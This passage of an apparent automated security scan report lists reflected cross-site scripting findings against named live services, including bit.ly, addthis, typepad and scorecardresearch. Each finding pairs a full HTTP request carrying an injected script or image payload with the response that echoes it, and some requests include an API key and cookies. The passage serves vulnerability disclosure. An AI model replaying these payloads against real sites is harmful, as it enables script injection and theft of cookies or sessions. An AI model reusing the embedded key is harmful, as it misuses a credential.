The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f5701<script>alert(1)</script>5c382736caa was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fxhtml.co.il%2F%2Fru%2FjQuery%2F%25D0%259F%25D0%25BE%25D0%25B6%25D0%25B5%25D1%2580%25D1%2582%25D0%25B2%25D0%25BE%25D0%25B2%25D0%25B0%25D1%2582%25D1%258C-%25D0%25BD%25D0%25B0-%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B5%25D0%25BA%25D1%2582&callback=_ate.cbs.sc_httpxhtmlcoilrujQuery25D0259F25D025BE25D025B625D025B525D1258025D1258225D025B225D025BE25D025B225D025B025D1258225D1258C25D025BD25D025B025D025BF25D1258025D025BE25D025B525D025BA25D12582f5701<script>alert(1)</script>5c382736caa HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://xhtml.co.il/ru/jQuery/%D0%9F%D0%BE%D0%B6%D0%B5%D1%80%D1%82%D0%B2%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0-%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; uid=4d1ec56b7612a62c; psc=0; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297258169.60|1296659685.66

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Wed, 09 Feb 2011 13:30:20 GMT
Content-Length: 249
Connection: close

_ate.cbs.sc_httpxhtmlcoilrujQuery25D0259F25D025BE25D025B625D025B525D1258025D1258225D025B225D025BE25D025B225D025B025D1258225D1258C25D025BD25D025B025D025BF25D1258025D025BE25D025B525D025BA25D12582f5701<script>alert(1)</script>5c382736caa({"shares":0});

1.54. http://api.bit.ly/v3/clicks [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/clicks

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ab034<script>alert(1)</script>77df4789a25 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v3/clicks?callback=BitlyCB._cb_._1ab034<script>alert(1)</script>77df4789a25&hash=gieIvT&login=retweetjs&apiKey=R_6287c92ecaf9efc6f39e4f33bdbf80b1&client=bitly-javascript-api HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:56 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 228
Etag: "6eaaf4608cfb2c1b81417046fb23c1b41c06a86e"

BitlyCB._cb_._1ab034<script>alert(1)</script>77df4789a25({"status_code": 200, "data": {"clicks": [{"user_clicks": 7, "global_hash": "gteAat", "hash": "gieIvT", "user_hash": "gieIvT", "global_clicks": 350}]}, "status_txt": "OK"})

1.55. http://api.bit.ly/v3/clicks [hash parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/clicks

Issue detail

The value of the hash request parameter is copied into the HTML document as plain text between tags. The payload da6f7<script>alert(1)</script>bd4549a5895 was submitted in the hash parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v3/clicks?callback=BitlyCB._cb_._1&hash=gieIvTda6f7<script>alert(1)</script>bd4549a5895&login=retweetjs&apiKey=R_6287c92ecaf9efc6f39e4f33bdbf80b1&client=bitly-javascript-api HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:58 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 162
Etag: "92132319e161a08b07ec905a27afdd89d4efe6c5"

BitlyCB._cb_._1({"status_code": 200, "data": {"clicks": [{"hash": "gieIvTda6f7<script>alert(1)</script>bd4549a5895", "error": "NOT_FOUND"}]}, "status_txt": "OK"})

1.56. http://api.bit.ly/v3/shorten [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e31ab<script>alert(1)</script>d5370509003 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v3/shorten?callback=BitlyCB._cb_._0e31ab<script>alert(1)</script>d5370509003&longUrl=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F&login=retweetjs&apiKey=R_6287c92ecaf9efc6f39e4f33bdbf80b1&client=bitly-javascript-api HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:56 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
MIME-Version: 1.0
Content-Length: 279

BitlyCB._cb_._0e31ab<script>alert(1)</script>d5370509003({ "status_code": 200, "status_txt": "OK", "data": { "long_url": "http:\/\/addyosmani.com\/blog\/video-jquerysub-explained\/", "url": "http:\/\/bit.ly\/gieIvT", "hash": "gieIvT", "global_hash": "gteAat
...[SNIP]...

1.57. http://api.bit.ly/v3/shorten [longUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /v3/shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 526ba<img%20src%3da%20onerror%3dalert(1)>1d168719f2c was submitted in the longUrl parameter. This input was echoed as 526ba<img src=a onerror=alert(1)>1d168719f2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /v3/shorten?callback=BitlyCB._cb_._0&longUrl=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F526ba<img%20src%3da%20onerror%3dalert(1)>1d168719f2c&login=retweetjs&apiKey=R_6287c92ecaf9efc6f39e4f33bdbf80b1&client=bitly-javascript-api HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:32:07 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
MIME-Version: 1.0
Content-Length: 282

BitlyCB._cb_._0({ "status_code": 200, "status_txt": "OK", "data": { "long_url": "http:\/\/addyosmani.com\/blog\/video-jquerysub-explained\/526ba<img src=a onerror=alert(1)>1d168719f2c", "url": "http:\/\/bit.ly\/eJxttl", "hash": "eJxttl", "global_hash": "hT5aoW", "new_hash": 1 } })

1.58. http://api.typepad.com/blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.typepad.com
Path:   /blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 10983<script>alert(1)</script>a859f55dcf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js?callback=jsonp1297262343116&max-results=3&10983<script>alert(1)</script>a859f55dcf4=1 HTTP/1.1
Host: api.typepad.com
Proxy-Connection: keep-alive
Referer: http://www.typepad.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=151985724.1297262343.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151985724.379581336.1297262343.1297262343.1297262343.1; __utmc=151985724; __utmb=151985724.1.10.1297262343

Response

HTTP/1.0 400 Bad Request
Date: Wed, 09 Feb 2011 14:38:58 GMT
Server: Apache
X-Webserver: oak-tp-app003
Access-Control-Allow-Origin: *
Content-Length: 66
Content-Type: text/plain; charset=utf-8
Connection: keep-alive

Invalid query arguments: 10983<script>alert(1)</script>a859f55dcf4

1.59. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 41073<script>alert(1)</script>881678aa397 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction41073<script>alert(1)</script>881678aa397&n=ar_int_p85001580&1297260410572 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.12;sz=300x250;click0=http://ib.adnxs.com/click/zMzMzMzMAECPwvUoXI_8PwAAAGBm5vs_TP6COGqw_j-HhsWoaw0CQKL1wI407bt8BWHfHSmrEEI1n1JNAAAAAMWRAwA2AQAAbAEAAAIAAACKwQIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEDgkAAQUCAAIAAAAAmSbu-wAAAAA./cnd=!ZhZOewie9AIQioMLGAAg5NUBKOcJMaelpaVrDQJAQhMIABAAGAAgASj-__________8BSABQAFioA2AAaOwC/referrer=http%3A//technorati.com//clickenc=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/RadioShack/SDYN_2011Q1/300/L38/1314851964/x90/USNetwork/RS_SDYN_2011Q1_ZT_DEF_30/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/RadioShack/SELL_2011Q1/DYN/300/L42/1232987503/x90/USNetwork/RS_SELL_2011Q1_ZT_DYN_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1232987503?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297260361%2E433%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 14:09:40 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction41073<script>alert(1)</script>881678aa397("");

1.60. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload f6b68<script>alert(1)</script>ef6909d873d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8f6b68<script>alert(1)</script>ef6909d873d&c2=6036211&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:43 GMT
Date: Wed, 09 Feb 2011 13:57:43 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8f6b68<script>alert(1)</script>ef6909d873d", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.61. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 7731f<script>alert(1)</script>a68c56a1299 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=7731f<script>alert(1)</script>a68c56a1299 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:44 GMT
Date: Wed, 09 Feb 2011 13:57:44 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
mscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"7731f<script>alert(1)</script>a68c56a1299", c15:"", c16:"", r:""});

1.62. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 67ea4<script>alert(1)</script>08e14236f5f was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=603621167ea4<script>alert(1)</script>08e14236f5f&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:43 GMT
Date: Wed, 09 Feb 2011 13:57:43 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"603621167ea4<script>alert(1)</script>08e14236f5f", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.63. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 9be33<script>alert(1)</script>4a9ab7d1f30 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=9be33<script>alert(1)</script>4a9ab7d1f30&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:43 GMT
Date: Wed, 09 Feb 2011 13:57:43 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6036211", c3:"9be33<script>alert(1)</script>4a9ab7d1f30", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.64. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ab81b<script>alert(1)</script>829280e7c49 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=ab81b<script>alert(1)</script>829280e7c49&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:44 GMT
Date: Wed, 09 Feb 2011 13:57:44 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"ab81b<script>alert(1)</script>829280e7c49", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.65. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload da613<script>alert(1)</script>50969b4edc7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=da613<script>alert(1)</script>50969b4edc7&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:44 GMT
Date: Wed, 09 Feb 2011 13:57:44 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"da613<script>alert(1)</script>50969b4edc7", c6:"", c10:"", c15:"", c16:"", r:""});

1.66. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 96c54<script>alert(1)</script>a945613aa0c was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=96c54<script>alert(1)</script>a945613aa0c&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:44 GMT
Date: Wed, 09 Feb 2011 13:57:44 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"96c54<script>alert(1)</script>a945613aa0c", c10:"", c15:"", c16:"", r:""});

1.67. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdbd9"><script>alert(1)</script>5626391a536 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMbdbd9"><script>alert(1)</script>5626391a536/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
